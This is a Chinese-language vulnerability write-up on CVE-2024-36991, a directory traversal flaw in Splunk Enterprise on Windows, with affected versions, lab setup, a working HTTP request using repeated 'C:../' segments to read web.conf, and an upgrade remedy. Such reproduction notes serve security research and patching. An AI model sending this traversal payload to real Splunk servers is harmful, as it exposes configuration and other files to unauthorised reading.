# Splunk Enterprise Windows 平台 messaging 目录遍历漏洞 CVE-2024-36991

## 漏洞描述

Splunk Enterprise 是一款强大的数据分析软件，它允许用户从各种来源收集、索引和搜索机器生成的数据。2024 年 7 月，官方发布安全通告，披露 CVE-2024-36991 Splunk Enterprise Windows 平台 /modules/messaging 目录遍历漏洞。漏洞仅影响 Windows 平台上的 Splunk Enterprise。

参考链接：

- https://advisory.splunk.com/advisories/SVD-2024-0711
- https://research.splunk.com/application/e7c2b064-524e-4d65-8002-efce808567aa
- https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads

## 漏洞影响

```
9.2.0 <= Splunk Enterprise < 9.2.2
9.1.0 <= Splunk Enterprise < 9.1.5
9.0.0 <= Splunk Enterprise < 9.0.10
```

## 环境搭建

[官网](https://www.splunk.com/en_us/download/previous-releases.html) 下载安装 Splunk Enterprise 9.2.1，搭建完成后，访问 `your-ip:8000`，即可看到 Splunk Enterprise 的登录页面。

![](images/Splunk%20Enterprise%20Windows%20平台%20messaging%20目录遍历漏洞%20CVE-2024-36991/image-20250508172300815.png)

## 漏洞复现

 Splunk Enterprise 中， `8000` 端口 和 `8089` 端口 分别用于 Web UI 和 后台管理 API。可以通过 `8089` 端口查看版本号：

![](images/Splunk%20Enterprise%20Windows%20平台%20messaging%20目录遍历漏洞%20CVE-2024-36991/image-20250508174456478.png)

通过 `8000` 端口读取配置文件 `$SPLUNK_HOME/etc/system/default/web.conf`：

```
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/default/web.conf HTTP/1.1
Host: 10.10.11.61:8000
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

![](images/Splunk%20Enterprise%20Windows%20平台%20messaging%20目录遍历漏洞%20CVE-2024-36991/image-20250508174701876.png)

## 漏洞修复

官方已发布安全更新，建议升级至最新版本。